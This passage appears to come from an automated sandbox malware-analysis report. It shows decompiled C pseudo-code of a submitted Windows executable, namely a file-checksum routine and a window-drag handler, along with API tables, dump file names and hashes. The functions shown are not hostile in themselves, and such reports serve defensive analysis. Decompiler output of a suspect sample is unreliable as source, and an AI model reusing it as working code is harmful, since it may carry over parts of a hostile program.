0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t42[1] & 0x000000ff ^ (_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t43[1] & 0x000000ff ^ ((_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t42[1] & 0x000000ff ^ (_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t44[1] & 0x000000ff ^ (((_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t42[1] & 0x000000ff ^ (_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t43[1] & 0x000000ff ^ ((_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + ((_t42[1] & 0x000000ff ^ (_t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) >> 0x00000008 ^  *(0x4090e8 + (( *_t42 & 0x000000ff ^ _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4)) & 0x000000ff) * 4);
                                                                                                                                                  										_t40 =  &(_t47[2]);
                                                                                                                                                  										_t100 = _t100 - 8;
                                                                                                                                                  										_t109 = _t109 - 1;
                                                                                                                                                  										_t103 = _t94 >> 0x00000008 ^  *(0x4090e8 + ((_t47[1] & 0x000000ff ^ _t94) & 0x000000ff) * 4);
                                                                                                                                                  									} while (_t109 != 0);
                                                                                                                                                  									_t50 =  *(_t110 + 0x10);
                                                                                                                                                  									_t106 =  *(_t110 + 0x14);
                                                                                                                                                  								}
                                                                                                                                                  								if(_t100 != 0) {
                                                                                                                                                  									do {
                                                                                                                                                  										_t103 = _t103 >> 0x00000008 ^  *(0x4090e8 + (( *_t40 & 0x000000ff ^ _t103) & 0x000000ff) * 4);
                                                                                                                                                  										_t40 = _t40 + 1;
                                                                                                                                                  										_t100 = _t100 - 1;
                                                                                                                                                  									} while (_t100 != 0);
                                                                                                                                                  								}
                                                                                                                                                  							} while (_t97 == 0x1000);
                                                                                                                                                  							_t98 =  *0x40b0f8; // 0x2040000
                                                                                                                                                  							HeapFree(_t98, 0, _t106);
                                                                                                                                                  						}
                                                                                                                                                  						CloseHandle(_t50);
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				return  !_t103;
                                                                                                                                                  			}






















                                                                                                                                                  0x00406960
                                                                                                                                                  0x00406968
                                                                                                                                                  0x0040696d
                                                                                                                                                  0x0040698d
                                                                                                                                                  0x00406992
                                                                                                                                                  0x00406996
                                                                                                                                                  0x0040699c
                                                                                                                                                  0x004069b0
                                                                                                                                                  0x004069b4
                                                                                                                                                  0x004069b8
                                                                                                                                                  0x004069c0
                                                                                                                                                  0x004069ce
                                                                                                                                                  0x004069d4
                                                                                                                                                  0x004069db
                                                                                                                                                  0x004069dd
                                                                                                                                                  0x004069df
                                                                                                                                                  0x004069e7
                                                                                                                                                  0x004069f0
                                                                                                                                                  0x004069fb
                                                                                                                                                  0x00406a2b
                                                                                                                                                  0x00406a3e
                                                                                                                                                  0x00406a57
                                                                                                                                                  0x00406a70
                                                                                                                                                  0x00406a87
                                                                                                                                                  0x00406a95
                                                                                                                                                  0x00406ab5
                                                                                                                                                  0x00406ab8
                                                                                                                                                  0x00406abb
                                                                                                                                                  0x00406abe
                                                                                                                                                  0x00406abe
                                                                                                                                                  0x00406ac6
                                                                                                                                                  0x00406aca
                                                                                                                                                  0x00406aca
                                                                                                                                                  0x00406ad0
                                                                                                                                                  0x00406ad2
                                                                                                                                                  0x00406ae0
                                                                                                                                                  0x00406ae7
                                                                                                                                                  0x00406aea
                                                                                                                                                  0x00406aea
                                                                                                                                                  0x00406ad2
                                                                                                                                                  0x00406aef
                                                                                                                                                  0x00406afb
                                                                                                                                                  0x00406b05
                                                                                                                                                  0x00406b0b
                                                                                                                                                  0x00406b0d
                                                                                                                                                  0x00406b13
                                                                                                                                                  0x00406b14
                                                                                                                                                  0x00406b1d

                                                                                                                                                  APIs
                                                                                                                                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,00000000,00000000), ref: 00406987
                                                                                                                                                  • RtlAllocateHeap.NTDLL(02040000,00000000,00001000), ref: 004069AA
                                                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00001000,?,00000000,?,?,00000000,00000000), ref: 004069CE
                                                                                                                                                  • HeapFree.KERNEL32(02040000,00000000,00000000,?,?,00000000,00000000), ref: 00406B05
                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000000), ref: 00406B0D
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.483844318.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.483785847.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484148161.0000000000409000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484482175.000000000040E000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484676366.000000000040F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_302746537.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileHeap$AllocateCloseCreateFreeHandleRead
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 873069550-0
                                                                                                                                                  • Opcode ID: 1357808eb39684694dda3eb8bae3d5a823f22cf334df4ffbb266c6879fa2417a
                                                                                                                                                  • Instruction ID: 2c35df999285d4324d5b8a2bb6c6846afef495587d3451632d7a4ed779350fa2
                                                                                                                                                  • Opcode Fuzzy Hash: 1357808eb39684694dda3eb8bae3d5a823f22cf334df4ffbb266c6879fa2417a
                                                                                                                                                  • Instruction Fuzzy Hash: 55418B326403920BD3149F74ECDAB773760EB46301F09823AFB52A62D2D67DD514DB18
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 66%
                                                                                                                                                  			E0040523F(struct HWND__* _a4, intOrPtr _a8, signed int _a12, unsigned int _a16) {
                                                                                                                                                  				struct HINSTANCE__* _v8;
                                                                                                                                                  				void _v12;
                                                                                                                                                  				struct tagPOINT _v20;
                                                                                                                                                  				intOrPtr _t104;
                                                                                                                                                  				void* _t110;
                                                                                                                                                  				void* _t111;
                                                                                                                                                  				void* _t112;
                                                                                                                                                  				int _t115;
                                                                                                                                                  				void* _t122;
                                                                                                                                                  				void* _t123;
                                                                                                                                                  				void* _t126;
                                                                                                                                                  				int _t129;
                                                                                                                                                  				void* _t130;
                                                                                                                                                  				int _t134;
                                                                                                                                                  				unsigned int _t141;
                                                                                                                                                  				int _t175;
                                                                                                                                                  				void* _t181;
                                                                                                                                                  				int _t182;
                                                                                                                                                  				int _t190;
                                                                                                                                                  				int* _t196;
                                                                                                                                                  				void* _t199;
                                                                                                                                                  				signed int _t201;
                                                                                                                                                  
                                                                                                                                                  				_t196 = E0040642D( *0x40b3ac);
                                                                                                                                                  				_v8 = 0xd0d0d0d1;
                                                                                                                                                  				if( *_t196 != 0) {
                                                                                                                                                  					_t104 = _a8;
                                                                                                                                                  					if(_t104 != 0x200) {
                                                                                                                                                  						if(_t104 != 0x100) {
                                                                                                                                                  							if(_t104 == 0x202) {
                                                                                                                                                  								L60:
                                                                                                                                                  								ReleaseCapture();
                                                                                                                                                  								L65:
                                                                                                                                                  								_v8 = 0;
                                                                                                                                                  								L66:
                                                                                                                                                  								return _v8;
                                                                                                                                                  							}
                                                                                                                                                  							if(_t104 != 0x215) {
                                                                                                                                                  								goto L66;
                                                                                                                                                  							}
                                                                                                                                                  							PostMessageA(_a4, 0x232, 0, 0);
                                                                                                                                                  							 *_t196 = 0;
                                                                                                                                                  							if(_t196[1] != 0) {
                                                                                                                                                  								SetCursorPos(_t196[2], _t196[3]);
                                                                                                                                                  							}
                                                                                                                                                  							goto L65;
                                                                                                                                                  						}
                                                                                                                                                  						_t110 = _a12 - 0xd;
                                                                                                                                                  						if(_t110 == 0) {
                                                                                                                                                  							goto L60;
                                                                                                                                                  						}
                                                                                                                                                  						_t111 = _t110 - 0xe;
                                                                                                                                                  						if(_t111 == 0) {
                                                                                                                                                  							goto L60;
                                                                                                                                                  						}
                                                                                                                                                  						_t199 = 0xa;
                                                                                                                                                  						_t112 = _t111 - _t199;
                                                                                                                                                  						if(_t112 == 0) {
                                                                                                                                                  							GetCursorPos( &_v20);
                                                                                                                                                  							_t115 = _t196[0xc];
                                                                                                                                                  							if(_t115 != 0) {
                                                                                                                                                  								if(_t115 != 3) {
                                                                                                                                                  									if(_t115 != 6) {
                                                                                                                                                  										_v20.x = _v20.x - _t199;
                                                                                                                                                  										L58:
                                                                                                                                                  										E004051F1(_t196, _a4, _v20.x, _v20.y);
                                                                                                                                                  										L59:
                                                                                                                                                  										goto L66;
                                                                                                                                                  									}
                                                                                                                                                  									_push(_t196[7]);
                                                                                                                                                  									L32:
                                                                                                                                                  									_push(_t196[4].left);
                                                                                                                                                  									_t196[0xc] = 7;
                                                                                                                                                  									L33:
                                                                                                                                                  									_push(0x7f83);
                                                                                                                                                  									L34:
                                                                                                                                                  									E00405093();
                                                                                                                                                  									goto L59;
                                                                                                                                                  								}
                                                                                                                                                  								_t122 = 2;
                                                                                                                                                  								L49:
                                                                                                                                                  								_push(_t196[5] + _t122);
                                                                                                                                                  								_t196[0xc] = 4;
                                                                                                                                                  								_t181 = _t196[4].left + _t122;
                                                                                                                                                  								L29:
                                                                                                                                                  								_push(_t181);
                                                                                                                                                  								_push(0x7f82);
                                                                                                                                                  								goto L34;
                                                                                                                                                  							}
                                                                                                                                                  							_t196[0xc] = 1;
                                                                                                                                                  							_push(_v20.y);
                                                                                                                                                  							_push(_t196[4]);
                                                                                                                                                  							L38:
                                                                                                                                                  							_push(0x7f84);
                                                                                                                                                  							goto L34;
                                                                                                                                                  						}
                                                                                                                                                  						_t123 = _t112 - 1;
                                                                                                                                                  						if(_t123 == 0) {
                                                                                                                                                  							GetCursorPos( &_v20);
                                                                                                                                                  							_t182 = _t196[0xc];
                                                                                                                                                  							if(_t182 != 0) {
                                                                                                                                                  								_t122 = 2;
                                                                                                                                                  								if(_t182 != _t122) {
                                                                                                                                                  									if(_t182 != 1) {
                                                                                                                                                  										_v20.y = _v20.y - _t199;
                                                                                                                                                  										goto L58;
                                                                                                                                                  									}
                                                                                                                                                  									goto L49;
                                                                                                                                                  								}
                                                                                                                                                  								_push(_t196[5]);
                                                                                                                                                  								_t196[0xc] = 5;
                                                                                                                                                  								_push(_t196[6] - _t122);
                                                                                                                                                  								goto L33;
                                                                                                                                                  							}
                                                                                                                                                  							_push(_t196[5]);
                                                                                                                                                  							_t196[0xc] = 3;
                                                                                                                                                  							L26:
                                                                                                                                                  							_push(_v20.x);
                                                                                                                                                  							_push(0x7f85);
                                                                                                                                                  							goto L34;
                                                                                                                                                  						}
                                                                                                                                                  						_t126 = _t123 - 1;
                                                                                                                                                  						if(_t126 == 0) {
                                                                                                                                                  							GetCursorPos( &_v20);
                                                                                                                                                  							_t129 = _t196[0xc];
                                                                                                                                                  							if(_t129 != 0) {
                                                                                                                                                  								if(_t129 != 3) {
                                                                                                                                                  									if(_t129 != 6) {
                                                                                                                                                  										_v20.x = _v20.x + _t199;
                                                                                                                                                  										goto L58;
                                                                                                                                                  									}
                                                                                                                                                  									_t130 = 2;
                                                                                                                                                  									L28:
                                                                                                                                                  									_push(_t196[7] - _t130);
                                                                                                                                                  									_t196[0xc] = 8;
                                                                                                                                                  									_t181 = _t196[6] - _t130;
                                                                                                                                                  									goto L29;
                                                                                                                                                  								}
                                                                                                                                                  								_push(_t196[5]);
                                                                                                                                                  								_t196[0xc] = 5;
                                                                                                                                                  								_push(_t196[6]);
                                                                                                                                                  								goto L33;
                                                                                                                                                  							}
                                                                                                                                                  							_t134 = 2;
                                                                                                                                                  							_t196[0xc] = _t134;
                                                                                                                                                  							_push(_v20.y);
                                                                                                                                                  							_push(_t196[6] - _t134);
                                                                                                                                                  							goto L38;
                                                                                                                                                  						}
                                                                                                                                                  						if(_t126 != 1) {
                                                                                                                                                  							goto L66;
                                                                                                                                                  						}
                                                                                                                                                  						GetCursorPos( &_v20);
                                                                                                                                                  						_t190 = _t196[0xc];
                                                                                                                                                  						if(_t190 != 0) {
                                                                                                                                                  							_t130 = 2;
                                                                                                                                                  							if(_t190 != _t130) {
                                                                                                                                                  								if(_t190 != 1) {
                                                                                                                                                  									_v20.y = _v20.y + _t199;
                                                                                                                                                  									goto L58;
                                                                                                                                                  								}
                                                                                                                                                  								_push(_t196[7] - _t130);
                                                                                                                                                  								goto L32;
                                                                                                                                                  							}
                                                                                                                                                  							goto L28;
                                                                                                                                                  						}
                                                                                                                                                  						_t196[0xc] = 6;
                                                                                                                                                  						_push(_t196[7]);
                                                                                                                                                  						goto L26;
                                                                                                                                                  					}
                                                                                                                                                  					_t141 = _a16;
                                                                                                                                                  					_t196[1] = 0;
                                                                                                                                                  					_v20.y = _t141 >> 0x10;
                                                                                                                                                  					_v20.x = _t141;
                                                                                                                                                  					MapWindowPoints(_a4, 0,  &_v20, 1);
                                                                                                                                                  					E004050C1(_t196, _v20.x, _v20.y);
                                                                                                                                                  					_t46 =  &(_t196[4]); // 0x10
                                                                                                                                                  					SendMessageA(_a4, 0x214, _t196[0xc], _t46);
                                                                                                                                                  					_push(_a4);
                                                                                                                                                  					asm("movsd");
                                                                                                                                                  					asm("movsd");
                                                                                                                                                  					asm("movsd");
                                                                                                                                                  					asm("movsd");
                                                                                                                                                  					E004051A3();
                                                                                                                                                  					goto L65;
                                                                                                                                                  				}
                                                                                                                                                  				if(_a8 != 0x112) {
                                                                                                                                                  					goto L66;
                                                                                                                                                  				}
                                                                                                                                                  				_t201 = _a12;
                                                                                                                                                  				if((_t201 & 0x0000fff0) != 0xf000) {
                                                                                                                                                  					goto L66;
                                                                                                                                                  				}
                                                                                                                                                  				SystemParametersInfoA(0x26, 0,  &_v12, 0);
                                                                                                                                                  				if(_v12 == 0) {
                                                                                                                                                  					goto L66;
                                                                                                                                                  				}
                                                                                                                                                  				_t6 =  &(_t196[4]); // 0x10
                                                                                                                                                  				_t196[0xc] = _t201 & 0x0000000f;
                                                                                                                                                  				 *_t196 = 1;
                                                                                                                                                  				GetWindowRect(_a4, _t6);
                                                                                                                                                  				_t9 =  &(_t196[8]); // 0x20
                                                                                                                                                  				GetWindowRect(_a4, _t9);
                                                                                                                                                  				_t196[0xd] = 0;
                                                                                                                                                  				_t196[0xe] = 0;
                                                                                                                                                  				_t196[0xf] = GetSystemMetrics(0x3d);
                                                                                                                                                  				_t196[0x10] = GetSystemMetrics(0x3e);
                                                                                                                                                  				if((GetWindowLongA(_a4, 0xfffffff0) & 0x00800000) == 0) {
                                                                                                                                                  					if((GetWindowLongA(_a4, 0xffffffec) & 0x00000100) == 0) {
                                                                                                                                                  						_t196[0x11] = 0;
                                                                                                                                                  						_t196[0x12] = 0;
                                                                                                                                                  						goto L10;
                                                                                                                                                  					}
                                                                                                                                                  					_t175 = GetSystemMetrics(0x2d);
                                                                                                                                                  					_push(0x2e);
                                                                                                                                                  					goto L8;
                                                                                                                                                  				} else {
                                                                                                                                                  					_t175 = GetSystemMetrics(5);
                                                                                                                                                  					_push(6);
                                                                                                                                                  					L8:
                                                                                                                                                  					_t196[0x11] = _t175;
                                                                                                                                                  					_t196[0x12] = GetSystemMetrics(??);
                                                                                                                                                  					L10:
                                                                                                                                                  					_t196[0x13] = GetSystemMetrics(0x22);
                                                                                                                                                  					_t196[0x14] = GetSystemMetrics(0x23);
                                                                                                                                                  					_t196[0x15] = GetSystemMetrics(0x3b);
                                                                                                                                                  					_t196[0x16] = GetSystemMetrics(0x3c);
                                                                                                                                                  					_t29 =  &(_t196[0xd]); // 0x34
                                                                                                                                                  					SendMessageA(_a4, 0x24, 0, _t29);
                                                                                                                                                  					if(GetKeyState(1) == 0) {
                                                                                                                                                  						SendMessageA(_a4, 0x201, 1, 0);
                                                                                                                                                  					}
                                                                                                                                                  					SetCapture(_a4);
                                                                                                                                                  					PostMessageA(_a4, 0x231, 0, 0);
                                                                                                                                                  					if(_t196[0xc] != 0) {
                                                                                                                                                  						_t196[1] = 0;
                                                                                                                                                  					} else {
                                                                                                                                                  						_t196[1] = 1;
                                                                                                                                                  						GetCursorPos( &(_t196[2]));
                                                                                                                                                  						SetCursor(LoadImageA(0, 0x7f86, 2, 0, 0, 0x8040));
                                                                                                                                                  					}
                                                                                                                                                  					goto L65;
                                                                                                                                                  				}
                                                                                                                                                  			}

























                                                                                                                                                  0x00405253
                                                                                                                                                  0x00405259
                                                                                                                                                  0x00405260
                                                                                                                                                  0x004053be
                                                                                                                                                  0x004053c6
                                                                                                                                                  0x0040542e
                                                                                                                                                  0x004055ec
                                                                                                                                                  0x004055df
                                                                                                                                                  0x004055df
                                                                                                                                                  0x00405618
                                                                                                                                                  0x00405618
                                                                                                                                                  0x0040561b
                                                                                                                                                  0x00405622
                                                                                                                                                  0x00405622
                                                                                                                                                  0x004055f3
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004055ff
                                                                                                                                                  0x00405608
                                                                                                                                                  0x0040560a
                                                                                                                                                  0x00405612
                                                                                                                                                  0x00405612
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040560a
                                                                                                                                                  0x00405437
                                                                                                                                                  0x0040543a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405440
                                                                                                                                                  0x00405443
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040544b
                                                                                                                                                  0x0040544c
                                                                                                                                                  0x0040544e
                                                                                                                                                  0x0040558e
                                                                                                                                                  0x00405594
                                                                                                                                                  0x00405599
                                                                                                                                                  0x004055b0
                                                                                                                                                  0x004055ba
                                                                                                                                                  0x004055c7
                                                                                                                                                  0x004055ca
                                                                                                                                                  0x004055d5
                                                                                                                                                  0x004055da
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004055da
                                                                                                                                                  0x004055c1
                                                                                                                                                  0x004054b9
                                                                                                                                                  0x004054b9
                                                                                                                                                  0x004054bc
                                                                                                                                                  0x004054c3
                                                                                                                                                  0x004054c3
                                                                                                                                                  0x004054c8
                                                                                                                                                  0x004054c8
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004054c8
                                                                                                                                                  0x004055b4
                                                                                                                                                  0x0040556e
                                                                                                                                                  0x00405573
                                                                                                                                                  0x00405577
                                                                                                                                                  0x0040557e
                                                                                                                                                  0x004054a6
                                                                                                                                                  0x004054a6
                                                                                                                                                  0x004054a7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004054a7
                                                                                                                                                  0x0040559b
                                                                                                                                                  0x004055a2
                                                                                                                                                  0x004055a5
                                                                                                                                                  0x004054fa
                                                                                                                                                  0x004054fa
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004054fa
                                                                                                                                                  0x00405454
                                                                                                                                                  0x00405455
                                                                                                                                                  0x00405531
                                                                                                                                                  0x00405537
                                                                                                                                                  0x0040553c
                                                                                                                                                  0x0040554f
                                                                                                                                                  0x00405552
                                                                                                                                                  0x0040556c
                                                                                                                                                  0x00405585
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405585
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040556c
                                                                                                                                                  0x00405557
                                                                                                                                                  0x0040555c
                                                                                                                                                  0x00405563
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405563
                                                                                                                                                  0x0040553e
                                                                                                                                                  0x00405541
                                                                                                                                                  0x00405483
                                                                                                                                                  0x00405483
                                                                                                                                                  0x00405486
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405486
                                                                                                                                                  0x0040545b
                                                                                                                                                  0x0040545c
                                                                                                                                                  0x004054de
                                                                                                                                                  0x004054e4
                                                                                                                                                  0x004054e9
                                                                                                                                                  0x00405504
                                                                                                                                                  0x0040551b
                                                                                                                                                  0x00405525
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405525
                                                                                                                                                  0x0040551f
                                                                                                                                                  0x00405494
                                                                                                                                                  0x00405499
                                                                                                                                                  0x0040549d
                                                                                                                                                  0x004054a4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004054a4
                                                                                                                                                  0x00405509
                                                                                                                                                  0x0040550e
                                                                                                                                                  0x00405515
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405515
                                                                                                                                                  0x004054f0
                                                                                                                                                  0x004054f1
                                                                                                                                                  0x004054f4
                                                                                                                                                  0x004054f9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004054f9
                                                                                                                                                  0x0040545f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405469
                                                                                                                                                  0x0040546f
                                                                                                                                                  0x00405474
                                                                                                                                                  0x0040548f
                                                                                                                                                  0x00405492
                                                                                                                                                  0x004054b1
                                                                                                                                                  0x004054d2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004054d2
                                                                                                                                                  0x004054b8
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004054b8
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405492
                                                                                                                                                  0x0040547b
                                                                                                                                                  0x00405482
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405482
                                                                                                                                                  0x004053c8
                                                                                                                                                  0x004053d4
                                                                                                                                                  0x004053d9
                                                                                                                                                  0x004053e4
                                                                                                                                                  0x004053e7
                                                                                                                                                  0x004053f5
                                                                                                                                                  0x004053fb
                                                                                                                                                  0x0040540a
                                                                                                                                                  0x00405415
                                                                                                                                                  0x00405418
                                                                                                                                                  0x00405419
                                                                                                                                                  0x0040541a
                                                                                                                                                  0x0040541b
                                                                                                                                                  0x0040541c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405421
                                                                                                                                                  0x0040526d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405273
                                                                                                                                                  0x00405282
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405290
                                                                                                                                                  0x00405299
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040529f
                                                                                                                                                  0x004052a9
                                                                                                                                                  0x004052b2
                                                                                                                                                  0x004052b8
                                                                                                                                                  0x004052ba
                                                                                                                                                  0x004052c1
                                                                                                                                                  0x004052cb
                                                                                                                                                  0x004052ce
                                                                                                                                                  0x004052d5
                                                                                                                                                  0x004052df
                                                                                                                                                  0x004052ed
                                                                                                                                                  0x00405306
                                                                                                                                                  0x00405318
                                                                                                                                                  0x0040531b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040531b
                                                                                                                                                  0x0040530a
                                                                                                                                                  0x0040530c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004052ef
                                                                                                                                                  0x004052f1
                                                                                                                                                  0x004052f3
                                                                                                                                                  0x0040530e
                                                                                                                                                  0x0040530e
                                                                                                                                                  0x00405313
                                                                                                                                                  0x0040531e
                                                                                                                                                  0x00405324
                                                                                                                                                  0x0040532b
                                                                                                                                                  0x00405332
                                                                                                                                                  0x0040533d
                                                                                                                                                  0x00405340
                                                                                                                                                  0x0040534a
                                                                                                                                                  0x00405357
                                                                                                                                                  0x00405364
                                                                                                                                                  0x00405364
                                                                                                                                                  0x00405369
                                                                                                                                                  0x00405379
                                                                                                                                                  0x00405382
                                                                                                                                                  0x004053b6
                                                                                                                                                  0x00405384
                                                                                                                                                  0x00405384
                                                                                                                                                  0x0040538f
                                                                                                                                                  0x004053ab
                                                                                                                                                  0x004053ab
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00405382

                                                                                                                                                  APIs
                                                                                                                                                  • SystemParametersInfoA.USER32(00000026,00000000,?,00000000), ref: 00405290
                                                                                                                                                  • GetWindowRect.USER32(?,00000010), ref: 004052B8
                                                                                                                                                  • GetWindowRect.USER32(?,00000020), ref: 004052C1
                                                                                                                                                  • GetSystemMetrics.USER32(0000003D), ref: 004052D1
                                                                                                                                                  • GetSystemMetrics.USER32(0000003E), ref: 004052D8
                                                                                                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 004052E2
                                                                                                                                                  • GetSystemMetrics.USER32(00000005), ref: 004052F1
                                                                                                                                                  • GetWindowLongA.USER32(?,000000EC), ref: 004052FC
                                                                                                                                                  • GetSystemMetrics.USER32(0000002D), ref: 0040530A
                                                                                                                                                  • GetSystemMetrics.USER32(0000002E), ref: 00405311
                                                                                                                                                  • GetSystemMetrics.USER32(00000022), ref: 00405320
                                                                                                                                                  • GetSystemMetrics.USER32(00000023), ref: 00405327
                                                                                                                                                  • GetSystemMetrics.USER32(0000003B), ref: 0040532E
                                                                                                                                                  • GetSystemMetrics.USER32(0000003C), ref: 00405335
                                                                                                                                                  • SendMessageA.USER32(?,00000024,00000000,00000034), ref: 0040534A
                                                                                                                                                  • GetKeyState.USER32(00000001), ref: 0040534E
                                                                                                                                                  • SendMessageA.USER32(?,00000201,00000001,00000000), ref: 00405364
                                                                                                                                                  • SetCapture.USER32(?), ref: 00405369
                                                                                                                                                  • PostMessageA.USER32(?,00000231,00000000,00000000), ref: 00405379
                                                                                                                                                  • GetCursorPos.USER32(-00000008), ref: 0040538F
                                                                                                                                                  • LoadImageA.USER32(00000000,00007F86,00000002,00000000,00000000,00008040), ref: 004053A4
                                                                                                                                                  • SetCursor.USER32(00000000), ref: 004053AB
                                                                                                                                                  • MapWindowPoints.USER32(?,00000000,?,00000001), ref: 004053E7
                                                                                                                                                  • SendMessageA.USER32(?,00000214,?,00000010), ref: 0040540A
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000007.00000002.483844318.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000007.00000002.483785847.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484148161.0000000000409000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484482175.000000000040E000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000007.00000002.484676366.000000000040F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_302746537.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: System$Metrics$Window$Message$Send$CursorLongRect$CaptureImageInfoLoadParametersPointsPostState
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 985555588-0
                                                                                                                                                  • Opcode ID: 63a5c3357b4a5747b66d9db94d4487f7d6bcd7bda56f759a115c6535e61ab02f
